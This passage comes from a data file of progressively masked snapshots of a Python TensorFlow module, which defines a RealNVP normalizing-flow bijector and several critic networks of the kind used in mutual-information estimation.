x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n <function token>\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n <function token>\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
